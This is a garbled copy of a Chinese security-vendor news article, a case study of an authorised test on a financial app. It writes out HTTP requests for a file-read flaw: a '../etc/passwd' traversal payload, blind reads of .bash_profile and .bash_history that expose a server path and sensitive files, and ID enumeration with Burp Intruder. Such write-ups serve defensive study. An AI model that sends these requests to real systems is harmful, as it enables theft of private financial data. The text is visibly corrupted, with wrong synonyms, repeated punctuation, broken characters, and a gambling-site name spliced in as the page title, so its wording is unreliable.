3377体育网官网入口

案例分享丨一次文件读取误差的“危害升级”历程

在授权测试某金融类APP时，，，，，，，，发明一个鸡肋低危文件读取误差，，，，，，，，实验将其升级为高危。。。。。。发明首次翻开APP时，，，，，，，，会向服务器读取文件加载并展示图片。。。。。。测试时一定要仔细，，，，，，，，笔者发明只有首次翻开APP时，，，，，，，，才会加载图片，，，，，，，，后面再翻开应该是资源已被纪录，，，，，，，，就不会向服务器再次举行请求了。。。。。。

新闻中心

案例分享丨一次文件读取误差的“危害升级”历程

宣布时间：2022-11-04

浏览次数：4480

分享：

在授权测试某金融类APP时，，，，，，，，发明一个鸡肋低危文件读取误差，，，，，，，，实验将其升级为高危。。。。。。

PS：本文仅用于手艺讨论与剖析，，，，，，，，严禁用于任何不法用途，，，，，，，，违者效果自尊。。。。。。

0x00 起源探测

发明首次翻开APP时，，，，，，，，会向服务器读取文件加载并展示图片。。。。。。

测试时一定要仔细，，，，，，，，笔者发明只有首次翻开APP时，，，，，，，，才会加载图片，，，，，，，，后面再翻开应该是资源已被纪录，，，，，，，，就不会向服务器再次举行请求了。。。。。。

此加载展示图片的GET请求数据包如下：

GET /ixxx/LgonImage.do?XxxxxImageDir=/XXXXX/Pictures&SaveXxxxxImageName=this_is_image.jpg HTTP/1.1

Host: xxxxx.com

Connection: close

User-Agent: Mozilla/5.0

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,en-US;q=0.8

拿到这个数据包的第一反应，，，，，，，，以往的渗透测试履历告诉我，，，，，，，，从这个地方或许路会保存文件读取误差。。。。。。

剖析并推测功效点URI的每个参数的功效。。。。。。

LogonImageDir=/XXXXX/Pictures - 图片所在的目录

SaveXxxxxImageName=this_is_image.jpg - 目录下的图片名

0x01 误差测试

既然已经起源探测到了可能保存误差的危害点，，，，，，，，并且文件读取功效的参数已经搞清晰，，，，，，，，下一步就睁开读取测试。。。。。。

首先测试，，，，，，，，是否可以举行目录列出，，，，，，，，直接将SaveXxxxxImageName参数置空，，，，，，，，看看是否可以读取/XXXXX/Pictures目录下的内容：

GET /ixxx/LogonImage.do?XxxxxImageDir=/XXXXX/Pictures&SaveXxxxxImageName= HTTP/1.1

Host: xxxxx.com

Connection: close

User-Agent: Mozilla/5.0

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,en-US;q=0.8

返回为“空”，，，，，，，，失败，，，，，，，，说明程序功效点不保存列出目录误差：

测试是否可以跳出目录，，，，，，，，选用Payload如下：

GET /ixxx/LogonImage.do?XxxxxImageDir=/XXXXX/Pictures/../../../../../../etc/&SaveXxxxxImageName=passwd HTTP/1.1

Host: xxxxx.com

Connection: close

User-Agent: Mozilla/5.0

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,en-US;q=0.8

返回某恒防火墙阻挡界面，，，，，，，，失败：

接下来进一步测试，，，，，，，，是/etc/passwd触发的WAF，，，，，，，，照旧/../触发的WAF。。。。。。

测试只举行一层目录跳出，，，，，，，，并且删除/etc/passwd要害字：

GET /ixxx/LogonImage.do?XxxxxImageDir=/XXXXX/Pictures/../&SaveXxxxxImageName= HTTP/1.1

Host: xxxxx.com

Connection: close

User-Agent: Mozilla/5.0

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,en-US;q=0.8

唔...看来/../的特殊字符就已经触发了WAF：

之后想到实验对数据包举行POST类型转换，，，，，，，，使用POST传参的一些方法举行WAF的测试，，，，，，，，如：

URL编码

分块传输

脏数据填充

包体转换

畸形数据包

......

可是无奈，，，，，，，，POST请求直接无法传参，，，，，，，，程序限制了GET请求吸收参数。。。。。。

（不过，，，，，，，，厥后测试其他POST传参的功效时，，，，，，，，发明以笔者现有的WAF绕过履历思绪，，，，，，，，基础无法对某恒的WAF举行绕过.....）

0x02 误差确认

总结以上对此文件读取误差网络到的信息：

目录无法跨越，，，，，，，，并且文件读取的路径在目今根目录；；；；；；；

特殊字符串，，，，，，，，已被WAF完善防护�。。。。。。�；；；；；；

无法获取目录下的文件名、无法预知是否可以读取其他后缀文件。。。。。。

测试到这里突然灵光一闪，，，，，，，，想到了“.bash_history”，，，，，，，，若是网站根目录保存此文件，，，，，，，，并且可以读取，，，，，，，，上面的疑问就可以直接解决泰半了，，，，，，，，先来相识一下这些文件作用：

.bash_profile：此文件为系统的每个用户设置情形信息，，，，，，，，当用户第一次登录时，，，，，，，，该文件被执行。。。。。。

.bash_history：该文件生涯了目今用户输入过的历史下令；；；；；；；

.bash_logout：该文件的用途是用户注销时执行的下令，，，，，，，，默以为空；；；；；；；

.bashrc：此文件为每一个运行bash shell的用户执行此文件。。。。。。当bash shell被翻开时，，，，，，，，该文件被读取。。。。。。

于是直接对网站根目录举行.bash_profile的盲测：

GET /ixxx/LogonImage.do?XxxxxImageDir=/&SaveXxxxxImageName=.bash_profile HTTP/1.1

Host: xxxxx.com

Connection: close

User-Agent: Mozilla/5.0

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,en-US;q=0.8

此payload既阻止了跳出目录，，，，，，，，又避开了WAF严打的特殊字符，，，，，，，，可是唯一遗漏的.bash文件被我们使用到了。。。。。。

激动的心颤抖的手，，，，，，，，看来目今网站根目录确实是此用户的目录，，，，，，，，并且用户在此根目录下执行过下令！

接下来实验进一步扩大危害。。。。。。

0x03 危害升级

不清晰目今目录结构，，，，，，，，就代表着无法定向读取文件，，，，，，，，可是尚有一个.bash_history我们没有使用到，，，，，，，，看看是否可以在其中获取到更主要的信息。。。。。。

读取根目录下的.bash_history：

GET /ixxx/LogonImage.do?XxxxxImageDir=/&SaveXxxxxImageName=.bash_history HTTP/1.1

Host: xxxxx.com

Connection: close

User-Agent: Mozilla/5.0

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,en-US;q=0.8

信息量虽然少，，，，，，，，可是已经有了新的希望：

由历史下令得知，，，，，，，，管理员cd进入了两层目录：/Nxxxx/xxFile/

并且审查了xx_20201022_51xxx.txt文件。。。。。。

直接结构读取此文件！

GET /ixxx/LogonImage.do?XxxxxImageDir=/Nxxxx/xxFile&SaveXxxxxImageName=xx_20201022_51xxx.txt HTTP/1.1

Host: xxxxx.com

Connection: close

User-Agent: Mozilla/5.0

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,en-US;q=0.8

乐成读取到了敏感的数据信息：

并且文件的ID值为时间戳+ID顺序编号组成，，，，，，，，可轻松遍历出所有的信息。。。。。。

Burpsuite Intruder�？？？？？？？？椴馐裕�

实验遍历10个ID值乐成。。。。。。

0x04 回首总结

保存的难题：目录无法跨越、WAF盯防、无法预知目录文件结构。。。。。。

在此情形下，，，，，，，，使用Linux文件系统特征，，，，，，，，仍然可以将低危误差提升至高危。。。。。。

并且危害的品级崎岖是无法预估的，，，，，，，，这取决于.bash_history会给我们泄露几多信息，，，，，，，，以是文件读取误差保存时间越久，，，，，，，，纪录的工具越多，，，，，，，，危害越大！

要害词标签：: 网络清静 文件读取误差,

上一篇乌镇之约 | 3377体育网官网入口邀您共赴2022年天下互联网大会

下一篇精选案例｜某广电单位清静服务项目

最新运动

公司声誉最高声誉加冕！3377体育网官网入口荣获2025年中国通讯学会科学手艺奖特等奖

2025-11-27

连忙审查

市场动态 3377体育网官网入口2025→2026：没有最好，，，，，，，，只有更好??

2026-01-04

连忙审查

市场动态《网络清静法》完成修改，，，，，，，，3377体育网官网入口深化“AI+清静”筑牢生长基本

2025-10-29

连忙审查

推荐新闻

3377体育网官网入口防火墙一连25年连任海内市场第一

审查详情

智算一体机标杆企业！3377体育网官网入口入编《2025-2026年中国智算一体机行业研究报告》

审查详情

3377体育网官网入口一连12年获CNNVD一级手艺支持单位称呼

审查详情

3377体育网官网入口与华为正式开启周全合作，，，，，，，，团结宣布“智算+清静”两大新品！

审查详情

3377体育网官网入口一连五届入选CICSVD国家工业信息清静误差库手艺组成员单位

审查详情

3377体育网官网入口智算一体机首批通过工信领域能力认证！

审查详情

推荐产品

解决计划

在线咨询

销售咨询>
手艺支持>
云服务支持>
售前支持>

在线留言

手艺支持>
售前支持>
培训营业>
清静服务>

客户服务热线

400-777-0777
7*24小时服务

联系邮箱

servicing@topsec.com.cn

扫码关注

【网站地图】【sitemap】